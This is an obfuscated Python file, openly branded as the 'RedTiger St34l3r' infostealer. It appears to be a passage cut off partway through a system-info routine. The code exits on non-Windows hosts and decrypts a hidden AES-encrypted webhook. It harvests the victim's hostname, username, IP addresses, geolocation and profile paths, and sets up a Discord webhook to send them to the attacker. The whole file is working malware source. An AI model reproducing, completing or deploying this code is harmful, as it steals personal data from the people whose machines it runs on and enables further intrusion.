
import sys

def IFUBYCHVMOZBRTUTXJCDDBPCSAQKHMRIMMHDSALKIMOUVFWITXSMELYODT():
    def QLKKKVSTNKUSFJSLGMVDMVWTQYJBXONYVTCKFSFOHZSQAARCLTLIWPQYNLAATKLBZPOSUFRRWW():
        if sys.platform.startswith("win"):
            return False
        else:
            return True
    
    try: 
        HTXBXKMKIYISTGGPUQAUZMGSQDQRZCFHZWXQHSUDGSXLZXXHRBYJPWGKVFYIMHMGOOSTMXGEL = QLKKKVSTNKUSFJSLGMVDMVWTQYJBXONYVTCKFSFOHZSQAARCLTLIWPQYNLAATKLBZPOSUFRRWW()
        if HTXBXKMKIYISTGGPUQAUZMGSQDQRZCFHZWXQHSUDGSXLZXXHRBYJPWGKVFYIMHMGOOSTMXGEL == True:
            return HTXBXKMKIYISTGGPUQAUZMGSQDQRZCFHZWXQHSUDGSXLZXXHRBYJPWGKVFYIMHMGOOSTMXGEL
    except:
        return True
    
if IFUBYCHVMOZBRTUTXJCDDBPCSAQKHMRIMMHDSALKIMOUVFWITXSMELYODT() == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import base64
import ctypes
import threading
import discord
from discord import SyncWebhook
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend

def JXPUTJLJOQNWZYYZVOKXZRESYRZRUVLSEFFZNNUFEPUHUUKHJMNIOLQZGVPUIOIIETAWUASJBBSVDIAEEOJTSGLJLUJ(): pass
def MHTZPHFBDYKRALDGRRXWKQOAUGQSLUIODLFZGSPJKPNLAJGXBMQLWFEHAMXMGLXNZNGQDVRHBV(): pass
def SYKEXMSKGVNITWPRUREELQTWHKSHKDIJOQRHZXJXDEVWGZJGMWPQAFSNCCNTTBQC(): pass
def KORXTKQEBXKZVKZUEJQOPPOGAQAVYGRDCJPRMCZEGOOYKCGDGDJPDLLFKENWXNQEDNNWHVFNXQK(): pass
def CUWKXJUORZQSTMOPFHCJHGGJXLBZAPWBMUTBKWRELMEIOHNVRUFOXLDQTTSIVRXLONKRHAEBSXFUEIVGOILYGVKXMBFXMLIV(): pass
def WBHSHBHWGYCOOZZWKLAYWRFCKBTGKBESMDRFQSOMGHVKXFHYTQGKRNHORDDGEOXPNPFDGNKG(): pass
def HKTJZNGTSWRDCVJCBBETNEOXIUGKWHSHNWIJUJRMBPCYGSMZGLDEHZBMJTFLKJJNWECSHESLAQ(): pass
def IALNNAOTDDMXONISTSGWNBKCOTBVIBRDKDRWWKGMZQXMXVMUCSJIYDTUHZCCBIWFV(): pass
def BFXWTRMHMJILTBPFLUFNMPKWOWSHVFGINTLVBHGJOCRGNOEJQYDMTJHKCLLASW(): pass
def TVZWRFYPNWPGVKKMQQVJEAZDFMZQKSMQZBJBPQNWMCYMVVXSWNV(): pass
def RYPJBCRTOJDEHHXGNROCNLTAOJNGBBCUFTIXDFLXIOCDQNTJEXWTXIFCJOQXPHOZZUKAMSBLPVFHGRDBLVKQHTOETQJAN(): pass
def VLXNDCPPRDXRBWXWFLXSOYATPVYPAYHJLYFELFYLSQPJDZQKICTHKYEYBJVDKDPABNSPCQSMQQMRISIEJXPYV(): pass
def EFDVRPPLDSCYSUXNYWVMYZNVUJUPPXGZDZBRUJFPYPNPHEWGCBNNSCFMCJDZNKISPK(): pass
def MQQGAFMZZMLIOFBFQZHBPFSUYEDCUUOMWKAOIFOHRHHRZJHHMBWLTKWBEQUESTVODDZZZAFZIEGSSTODFPJSVTVMDXBRNVGE(): pass
def PKGJRJFDNCRITZTRNPHGNDMKSCLQCTTFHBJRJSUNYXGCZSCZTBTCCBRRZTLSLHQPLTCXJSTTMXSTTMDRWUJMPPPBNTOGG(): pass
def FPDRGGRKYWNHYTYTXCHKWKCHZIQBHQKZDTZTGQHXFMPKXKTAXPHESTQGEMKWJIEGUJIYDBNHJPXFLFSUKXHW(): pass
def FBPWGRBCIHTUKIDXPOHKTKXLRHSLYCPDWXWTUKTTPNBKWRWKUHDUKERUDYTHRQYNKLJ(): pass
def NVXGTKFYUFIAQYKFBGUFGHEHPRMVIOUXIFRACFFAWTUVVWOTFSCZFCWXTVDXKDBKXEMTEMYLLRDSCIIHPCONKJVASE(): pass
def ABGTSNFDNFCTAFIKMGEZRNQQHWLHOVGOFPKZWUKVGXYWTAMHCASHQKZBDZIUARYMALFGERGDHKMOFLGKOKSCULIXHFEU(): pass
def RQJROHGFARSPDMNETMXNHHZUOBKUZDGVNFUMCNAOKKHUASIURHRXOQZAAFRFOYGPVIXKXTCKTNLYWHKDIBLUMBYJAJYRPA(): pass

def HRGSHNKUSTFGIHGBSHSZQTXYTJRACSMVVMQKMBYSVMTBCLSXQQASA(w3bh00k_ur1, title=None, description=None):
    try:
        client = SyncWebhook.from_url(w3bh00k_ur1)
        embed = discord.Embed(
            title=title,
            description=description,
            color= RMJJMOUXTBZJYWBWEOIPOWSROASXCPITCQRFHZCMWGHOCMVPRTUVL
        )
        embed.set_footer(text=ILDRTXVCRNWREWBTBHGYUDNLNATSSHGVKKJGTOVFIEONBRWNVPZQMFZAARZWDVWYGASSOCMHQCWHDNBGKNCZIID, icon_url=COASRMXSAMPXHOXYUWRRBRLZMBUSVLSKJRFSVWDYBTJCPHVTVJCF)
        client.send(embed=embed, username=FYFMYAFLJDYUCGHTYCCAPJNVUNHWJWIQAXESUCAINNDVRADDNAYRYOGMTXE, avatar_url=COASRMXSAMPXHOXYUWRRBRLZMBUSVLSKJRFSVWDYBTJCPHVTVJCF)
    except: pass

def QOJJJVRGCUXAEZATWJNPAQIEAYKYVGQJGDXERUVQINYQMIPFONPZJYFVZAXNPMCJLNTISIRADRVGLQW(title):
    try:
        if sys.platform.startswith("win"):
            ctypes.windll.kernel32.SetConsoleTitleW(title)
        elif sys.platform.startswith("linux"):
            sys.stdout.write(f"\x1b]2;{title}\x07")
    except:
        pass
        
def PHKXGAQHLAYCVTCRVOBUTKDUYNRMVHNQDOYQKXRFHNDQHOMICMKBYPVMAVZSIBXTBAP():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def IFHYRBRBYXXZSXCRCJRUXRQHFICHOEMTKMYZUPMOXNGYRJDXWFQSUSTBCJXPLIATCWECDFAAZPYPQEYPT(GVQPHIGJNVPKUPNKNVRYXXLSCUMDMOZOJYYQDCJNANFUHVJMVSWOHVDSPSWIFLDSIXMDWJAFPYUU, WNQWDBYKPCRMVCKCITNUDLRJSFETSBVVJRKOHDEIHVOOZDPFBYUJLMJNAPNLIDBIFLMIVUOY):
    def ESWDAPEISOWTSCIEQOCBIOPZNRZSQFWNFZYOQMHPDTYONYQDFEAIIYUIZ(NSTXHFTSAOQRTTLCTBLHPOFOIGJRVYODGSPUNOGKSWNZYBDQUTKJKNZSVLOSLDCVYSKMGFHYBXDP, RIJOGIDPLUKMMRCECTHVHKGEUMGGMYGLUOSHEGRENLHNYYMUBLGIYOVZDDSRUOPIOXOYNMZRIKGOWNIISWRAZV):
        BXYFUKEURXPWIQBCVDUGQWJWTMXEOSHFGHLFXARNGFPHCXBMQRFFDLJSPPCXS = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=RIJOGIDPLUKMMRCECTHVHKGEUMGGMYGLUOSHEGRENLHNYYMUBLGIYOVZDDSRUOPIOXOYNMZRIKGOWNIISWRAZV, iterations=100000, backend=default_backend())
        if isinstance(NSTXHFTSAOQRTTLCTBLHPOFOIGJRVYODGSPUNOGKSWNZYBDQUTKJKNZSVLOSLDCVYSKMGFHYBXDP, str):  
            NSTXHFTSAOQRTTLCTBLHPOFOIGJRVYODGSPUNOGKSWNZYBDQUTKJKNZSVLOSLDCVYSKMGFHYBXDP = NSTXHFTSAOQRTTLCTBLHPOFOIGJRVYODGSPUNOGKSWNZYBDQUTKJKNZSVLOSLDCVYSKMGFHYBXDP.encode()  
        return BXYFUKEURXPWIQBCVDUGQWJWTMXEOSHFGHLFXARNGFPHCXBMQRFFDLJSPPCXS.derive(NSTXHFTSAOQRTTLCTBLHPOFOIGJRVYODGSPUNOGKSWNZYBDQUTKJKNZSVLOSLDCVYSKMGFHYBXDP)

    GVQPHIGJNVPKUPNKNVRYXXLSCUMDMOZOJYYQDCJNANFUHVJMVSWOHVDSPSWIFLDSIXMDWJAFPYUU_data = base64.b64decode(GVQPHIGJNVPKUPNKNVRYXXLSCUMDMOZOJYYQDCJNANFUHVJMVSWOHVDSPSWIFLDSIXMDWJAFPYUU)
    RIJOGIDPLUKMMRCECTHVHKGEUMGGMYGLUOSHEGRENLHNYYMUBLGIYOVZDDSRUOPIOXOYNMZRIKGOWNIISWRAZV = GVQPHIGJNVPKUPNKNVRYXXLSCUMDMOZOJYYQDCJNANFUHVJMVSWOHVDSPSWIFLDSIXMDWJAFPYUU_data[:16]
    BQPDUVTNUMAUNCOZFEVQIQUANGGVCEGVFNIACOZIYGNESCGXVNDQIVJZCLTCHPNXWYFUUZQZXAHVXKVTODIUACLAK = GVQPHIGJNVPKUPNKNVRYXXLSCUMDMOZOJYYQDCJNANFUHVJMVSWOHVDSPSWIFLDSIXMDWJAFPYUU_data[16:32]
    GVQPHIGJNVPKUPNKNVRYXXLSCUMDMOZOJYYQDCJNANFUHVJMVSWOHVDSPSWIFLDSIXMDWJAFPYUU_data = GVQPHIGJNVPKUPNKNVRYXXLSCUMDMOZOJYYQDCJNANFUHVJMVSWOHVDSPSWIFLDSIXMDWJAFPYUU_data[32:]
    CWRZOBESMCLEJYGWISQBUYQQSNXFWDXSPTGLKNDRQZOIHEWUZPUCKXWGAGYVJKCSWUJDB = ESWDAPEISOWTSCIEQOCBIOPZNRZSQFWNFZYOQMHPDTYONYQDFEAIIYUIZ(WNQWDBYKPCRMVCKCITNUDLRJSFETSBVVJRKOHDEIHVOOZDPFBYUJLMJNAPNLIDBIFLMIVUOY, RIJOGIDPLUKMMRCECTHVHKGEUMGGMYGLUOSHEGRENLHNYYMUBLGIYOVZDDSRUOPIOXOYNMZRIKGOWNIISWRAZV)
    FLOEYNGGFSNDCONICTOJZSFZTGCPWQACMJBVMEKCYAEUMAXHIBHFHWMUGUYRSDWGFIJSJFCWPRCWSMS = Cipher(algorithms.AES(CWRZOBESMCLEJYGWISQBUYQQSNXFWDXSPTGLKNDRQZOIHEWUZPUCKXWGAGYVJKCSWUJDB), modes.CBC(BQPDUVTNUMAUNCOZFEVQIQUANGGVCEGVFNIACOZIYGNESCGXVNDQIVJZCLTCHPNXWYFUUZQZXAHVXKVTODIUACLAK), backend=default_backend())
    AJWBFTYEISJASTINOGQYYBHLMPVPGBTMHUENCQBMFOXFVABVYLAHOWNCNORAZUVYHHTNPD = FLOEYNGGFSNDCONICTOJZSFZTGCPWQACMJBVMEKCYAEUMAXHIBHFHWMUGUYRSDWGFIJSJFCWPRCWSMS.decryptor()
    TMHXQULPRTFNGLXFBMRGXIQOMSZPQDVOLYHPBBISADIWKVHJRLCHFSMZWHDGEUWVTZDLTBFHHMXCBEOFZHSEPPWWRJK = AJWBFTYEISJASTINOGQYYBHLMPVPGBTMHUENCQBMFOXFVABVYLAHOWNCNORAZUVYHHTNPD.update(GVQPHIGJNVPKUPNKNVRYXXLSCUMDMOZOJYYQDCJNANFUHVJMVSWOHVDSPSWIFLDSIXMDWJAFPYUU_data) + AJWBFTYEISJASTINOGQYYBHLMPVPGBTMHUENCQBMFOXFVABVYLAHOWNCNORAZUVYHHTNPD.finalize()
    JPMVNDPEALZMMLCCQZFKZTUYLZRAEGOACHFYFNNJCDUNDJGCUGWS = padding.PKCS7(128).unpadder()
    AYHJNTOLODWHPQSFMRAFPOHDSWZWXYDQAGCUMUPPBPLZJTCDUAWTEPFCWV = JPMVNDPEALZMMLCCQZFKZTUYLZRAEGOACHFYFNNJCDUNDJGCUGWS.update(TMHXQULPRTFNGLXFBMRGXIQOMSZPQDVOLYHPBBISADIWKVHJRLCHFSMZWHDGEUWVTZDLTBFHHMXCBEOFZHSEPPWWRJK) + JPMVNDPEALZMMLCCQZFKZTUYLZRAEGOACHFYFNNJCDUNDJGCUGWS.finalize()
    return AYHJNTOLODWHPQSFMRAFPOHDSWZWXYDQAGCUMUPPBPLZJTCDUAWTEPFCWV.decode()

QOJJJVRGCUXAEZATWJNPAQIEAYKYVGQJGDXERUVQINYQMIPFONPZJYFVZAXNPMCJLNTISIRADRVGLQW("")

try: MWURGOLWUVQRULJWBOYUHSIVTLUQUYEMHQUOIXGRJBBLRVQZNWDGNFLCMOKCKRCWGJBFJDWGHVLSNAWI    = socket.gethostname()
except: MWURGOLWUVQRULJWBOYUHSIVTLUQUYEMHQUOIXGRJBBLRVQZNWDGNFLCMOKCKRCWGJBFJDWGHVLSNAWI = "None"

try: UQOPOUMYMRDAHQLWHYSVMGQAXSFKXFOHEKEINQGTNMFDETSWCTYYIMBWIFZZHRUSSHNDJQCKGBYDSRWHHPOYM    = os.getlogin()
except: UQOPOUMYMRDAHQLWHYSVMGQAXSFKXFOHEKEINQGTNMFDETSWCTYYIMBWIFZZHRUSSHNDJQCKGBYDSRWHHPOYM = "None"

try: QFUJFVIZZJBJFZONNNRSFJLVIRUHBKFAPCJESHELJYGELHCCETNATRMSFJVCCJBUCHGRENTCPHZCF    = win32api.GetUserNameEx(win32api.NameDisplay)
except: QFUJFVIZZJBJFZONNNRSFJLVIRUHBKFAPCJESHELJYGELHCCETNATRMSFJVCCJBUCHGRENTCPHZCF = "None"

try: AKUYUPHZBZDZZQGNDZKGHKPGKCDHEHNFPKBLLZXCPTSJMMZHYYQIILJSPEITNEGWVHHXJUWUUXSRXINILDFRVSBHKUIUZXJ    = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: AKUYUPHZBZDZZQGNDZKGHKPGKCDHEHNFPKBLLZXCPTSJMMZHYYQIILJSPEITNEGWVHHXJUWUUXSRXINILDFRVSBHKUIUZXJ = "None"

try: PCBTMSQYGTAZQZDDYTDNGZONCLRSQTOWORABRAZHVVZPLFCDTBJTNLCYKJFYMQDNNWMQFJJFQVRKAXDFOVUCJAYJ    = socket.gethostbyname(socket.gethostname())
except: PCBTMSQYGTAZQZDDYTDNGZONCLRSQTOWORABRAZHVVZPLFCDTBJTNLCYKJFYMQDNNWMQFJJFQVRKAXDFOVUCJAYJ = "None"

BJXFBVWSXCTDIIUMPJSFQKZVBFQHCPJSIVEYJVDOHFBYOHKTOYVOYPKHWJRQTTKVIXMNRJAVGALZ = r"""
RVLRMsMWz7Fh+GbD6kVWXMPNQ9chEFC2z9vQnohcoDYiL+1vJ2aU0SakWupAeav4esTBxD53R4bLXXyrcj/PkUXLavVDnXHJ8Ar1QZwkr7KLKbMn0L8FgInUIaYbHprLhMx9oFMQL1a6YE1g6+xgsjnDYpo+LiPPOanHZwbaXq0R9OS4c1kmbqAB9pm7DJCEf02ykVZsvcWOY8GaG6cU7w==
"""

XHJYSKELRDHSCFSMEIAIIFQYRDQXIUPLOLDNANGXMXNQDEMFNVSCKQZALEYOMQPIZAHEHGLJFSBCPAFFSJROXGIUF            = "yaSpnOARwuuSeMpyfAfBPFerOCaYMJLttTklaYlkUmqpKEOyQqKbKelXYCDcmFNuCnMLZStNQyhuGEdUCjcDVDutpTWIKfzaOUnlUaCCHQhFALsvDxaMtOFMSAzuYzGTPXsWQFLXofhaePgLMMqfOkWrvcIyeonUPmslFhoJlKkEUBjfWseXdd"
FLBBGPHYEXFQYICCFVCBJUSCVRADNAHFLVLHPRAQEOUXDDVDUFFKCEGXQIYUDUHJWAMYOSNKYMRYIUD        = "redtiger.shop"
RMJJMOUXTBZJYWBWEOIPOWSROASXCPITCQRFHZCMWGHOCMVPRTUVL    = 0xa80505
FYFMYAFLJDYUCGHTYCCAPJNVUNHWJWIQAXESUCAINNDVRADDNAYRYOGMTXE = "RedTiger St34l3r"
COASRMXSAMPXHOXYUWRRBRLZMBUSVLSKJRFSVWDYBTJCPHVTVJCF   = "https://cdn.discordapp.com/attachments/1337898355279401023/1341890893858213908/RedTiger-Logo.png?ex=67b7a4c8&is=67b65348&hm=174ddbd80dd8570fa83779687def6eda441a7c12abd3765d970c1958ceeb1ec8&"
ILDRTXVCRNWREWBTBHGYUDNLNATSSHGVKKJGTOVFIEONBRWNVPZQMFZAARZWDVWYGASSOCMHQCWHDNBGKNCZIID    = "RedTiger St34l3r - github.com/loxy0dev/RedTiger-Tools"
DQRLOTCHMDLHQEXWNHLPQZXNTHVIFGTMLYVFAQVENVOJOMVZNHDSHIWNLDGZDJRDUBUXRALIBNCU   = {"text": ILDRTXVCRNWREWBTBHGYUDNLNATSSHGVKKJGTOVFIEONBRWNVPZQMFZAARZWDVWYGASSOCMHQCWHDNBGKNCZIID, "icon_url": COASRMXSAMPXHOXYUWRRBRLZMBUSVLSKJRFSVWDYBTJCPHVTVJCF}
TGYOUIFMOWKYZIOUPHVPRESMWIAADIZAXDPGRUJRHHQVDLSQEWTQDIHYMZBIQSQLOQBAVYWWLBBOWBNN    = f'`{UQOPOUMYMRDAHQLWHYSVMGQAXSFKXFOHEKEINQGTNMFDETSWCTYYIMBWIFZZHRUSSHNDJQCKGBYDSRWHHPOYM} "{AKUYUPHZBZDZZQGNDZKGHKPGKCDHEHNFPKBLLZXCPTSJMMZHYYQIILJSPEITNEGWVHHXJUWUUXSRXINILDFRVSBHKUIUZXJ}"`'
JWYVDZHULQYWOKJLEHQDUESUOVMLMYRUDBDTLOWPXWFUXKESODFHFUQJVZIVWAEAIQFRPAONONS    = IFHYRBRBYXXZSXCRCJRUXRQHFICHOEMTKMYZUPMOXNGYRJDXWFQSUSTBCJXPLIATCWECDFAAZPYPQEYPT(BJXFBVWSXCTDIIUMPJSFQKZVBFQHCPJSIVEYJVDOHFBYOHKTOYVOYPKHWJRQTTKVIXMNRJAVGALZ, XHJYSKELRDHSCFSMEIAIIFQYRDQXIUPLOLDNANGXMXNQDEMFNVSCKQZALEYOMQPIZAHEHGLJFSBCPAFFSJROXGIUF)

UCLGZMCDGEFDZXEWVVNMYNNLRQLNIZLGXDZPTVBIDVPJVZNSGPGOJQ         = os.getenv("WINDIR", None).replace(" ", "%20")
NPUGPFOYEAHNHXOBCEWKSGALQSCVZHZPSXGZQTSVPZVOJBRNLIEPJVAEASDOJVOKKOQLICRJUBMFXUQPD     = os.getenv('USERPROFILE', None).replace(" ", "%20")
DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL   = os.getenv('LOCALAPPDATA', None).replace(" ", "%20")
UFZPKGXXDDSRPTQWDCTBJGPPTRLCFFUSRJUYSTNCLGLACKRNOVHMNGNTMPHFKBTSWXAIHBIAVGPYKUYEDDVAJUQHSYHNAY = os.getenv('APPDATA', None).replace(" ", "%20")

try:
    HVQNJOBWKXBWDVDKNOQVHYARXGHDEYNLICAATFUFCHKTJLRJEZQIDCHAPQWWQRCFKCNI = requests.get(f"https://{FLBBGPHYEXFQYICCFVCBJUSCVRADNAHFLVLHPRAQEOUXDDVDUFFKCEGXQIYUDUHJWAMYOSNKYMRYIUD}/api/ip/ip={AKUYUPHZBZDZZQGNDZKGHKPGKCDHEHNFPKBLLZXCPTSJMMZHYYQIILJSPEITNEGWVHHXJUWUUXSRXINILDFRVSBHKUIUZXJ}")
    EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA = HVQNJOBWKXBWDVDKNOQVHYARXGHDEYNLICAATFUFCHKTJLRJEZQIDCHAPQWWQRCFKCNI.json()

    RQTSMDSHZCAUKVAEOHWDHHGGXRGSPABBEEVCUAWGSJECFNHRRKLVATZMWDREBBNWWDCKOVQNNBFYKV = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('country', "None")
    RQTSMDSHZCAUKVAEOHWDHHGGXRGSPABBEEVCUAWGSJECFNHRRKLVATZMWDREBBNWWDCKOVQNNBFYKV_code = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('country_code', "None")
    KWLURGWPCALKRPIDKLBTEUSKBTMVEIMTCQZGIDMWZTSPZPLUBZKUJDYADWTIUBTGKVSIDOKOUFWOIWALCDYEHTMY = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('region', "None")
    KWLURGWPCALKRPIDKLBTEUSKBTMVEIMTCQZGIDMWZTSPZPLUBZKUJDYADWTIUBTGKVSIDOKOUFWOIWALCDYEHTMY_code = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('region_code', "None")
    VEVYTXWDTWTXNOEQDUIKLCATGCFJABNBYLEQNXQVVLCXKYIKUVCYCHIZCAWUWDQOHQKEYPENXPGYWHQXNAX = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('zip', "None")
    BUWXHWTSUVUZMTVZJZJRANQWKEXVSLVEXPFNDXIHCDDBQYTNAKPODCUKEXOOTDUECCQBPYEPALFSDQKRIPINXCTSHNYNLYFCUON = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('city', "None")
    FOHITUHLNMQFPMJYORXSRBBDIBGPWDLIFXCSSOXUZAOYSXLHFBOHPRLWPUGCMVFPQXZPMK = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('latitude', "None")
    DQBTEDHUMOEMIJRKWLCBONICLDRHQXPHRDDKXHIBSUIEBWIBSEIGYNDPSDXRNXQPCJVPPRCQ = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('longitude', "None")
    IQJFWKRUBTKQGLQZGCWFYRXJUSFRBIMJVIKZCJMUVIEOVOVMZTHMWKEAYLLWBE = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('timezone', "None")
    CQAGZRLBQKXNLMABYDEPJVQIBUOZKAEGMPIYGFTECZUSQYZJVLWZDYTVCYUZXNJZNJXJSXSCSYRCHSDHZ = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('isp', "None")
    KFKCTYMCVXKZXUOSUUUBNVJKVDAIVTWSDQLHKKVPVWKBZBVEEFBWMROUEUKERUZDLJWNDDXFAHJPHTHTQWIS = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('org', "None")
    WLCBETUWQYTGCGKANEZIATKVXIHFSXPBNMZKLAQIGFCWIMKECWZNVTN = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('as', "None")
except:
    HVQNJOBWKXBWDVDKNOQVHYARXGHDEYNLICAATFUFCHKTJLRJEZQIDCHAPQWWQRCFKCNI = requests.get(f"http://ip-api.com/json/{AKUYUPHZBZDZZQGNDZKGHKPGKCDHEHNFPKBLLZXCPTSJMMZHYYQIILJSPEITNEGWVHHXJUWUUXSRXINILDFRVSBHKUIUZXJ}")
    EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA = HVQNJOBWKXBWDVDKNOQVHYARXGHDEYNLICAATFUFCHKTJLRJEZQIDCHAPQWWQRCFKCNI.json()

    RQTSMDSHZCAUKVAEOHWDHHGGXRGSPABBEEVCUAWGSJECFNHRRKLVATZMWDREBBNWWDCKOVQNNBFYKV = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('country', "None")
    RQTSMDSHZCAUKVAEOHWDHHGGXRGSPABBEEVCUAWGSJECFNHRRKLVATZMWDREBBNWWDCKOVQNNBFYKV_code = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('countryCode', "None")
    KWLURGWPCALKRPIDKLBTEUSKBTMVEIMTCQZGIDMWZTSPZPLUBZKUJDYADWTIUBTGKVSIDOKOUFWOIWALCDYEHTMY = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('regionName', "None")
    KWLURGWPCALKRPIDKLBTEUSKBTMVEIMTCQZGIDMWZTSPZPLUBZKUJDYADWTIUBTGKVSIDOKOUFWOIWALCDYEHTMY_code = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('region', "None")
    VEVYTXWDTWTXNOEQDUIKLCATGCFJABNBYLEQNXQVVLCXKYIKUVCYCHIZCAWUWDQOHQKEYPENXPGYWHQXNAX = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('zip', "None")
    BUWXHWTSUVUZMTVZJZJRANQWKEXVSLVEXPFNDXIHCDDBQYTNAKPODCUKEXOOTDUECCQBPYEPALFSDQKRIPINXCTSHNYNLYFCUON = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('city', "None")
    FOHITUHLNMQFPMJYORXSRBBDIBGPWDLIFXCSSOXUZAOYSXLHFBOHPRLWPUGCMVFPQXZPMK = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('lat', "None")
    DQBTEDHUMOEMIJRKWLCBONICLDRHQXPHRDDKXHIBSUIEBWIBSEIGYNDPSDXRNXQPCJVPPRCQ = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('lon', "None")
    IQJFWKRUBTKQGLQZGCWFYRXJUSFRBIMJVIKZCJMUVIEOVOVMZTHMWKEAYLLWBE = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('timezone', "None")
    CQAGZRLBQKXNLMABYDEPJVQIBUOZKAEGMPIYGFTECZUSQYZJVLWZDYTVCYUZXNJZNJXJSXSCSYRCHSDHZ = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('isp', "None")
    KFKCTYMCVXKZXUOSUUUBNVJKVDAIVTWSDQLHKKVPVWKBZBVEEFBWMROUEUKERUZDLJWNDDXFAHJPHTHTQWIS = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('org', "None")
    WLCBETUWQYTGCGKANEZIATKVXIHFSXPBNMZKLAQIGFCWIMKECWZNVTN = EMUXDQHHRLDMWRNVOTOJLBXPPJPHLZUBEAUZGGYBKSYJNXQZAKQCNDVEBAIYLQZIASMUMHTYBNOIDFGSXTHDYA.get('as', "None")

def HKTJZNGTSWRDCVJCBBETNEOXIUGKWHSHNWIJUJRMBPCYGSMZGLDEHZBMJTFLKJJNWECSHESLAQ():
    import platform
    import subprocess
    import uuid
    import psutil
    import GPUtil
    import ctypes
    import win32api
    import string
    import screeninfo
    from discord import SyncWebhook, Embed

    try: GVPHGVSNRENMHESWZBSSFFELDVIYFCCZDNPECMLVFGWLLFUJNJNTWTHKMAOCXLVXNFXGTXXFAREDOJ = {platform.system()}
    except: GVPHGVSNRENMHESWZBSSFFELDVIYFCCZDNPECMLVFGWLLFUJNJNTWTHKMAOCXLVXNFXGTXXFAREDOJ = "None"

    try: CENXTQFANDZPHPISXIGPEIZRRUXPAAZUSBTRFDDUYKUQOJFVVYR = platform.version()
    except: CENXTQFANDZPHPISXIGPEIZRRUXPAAZUSBTRFDDUYKUQOJFVVYR = "None"

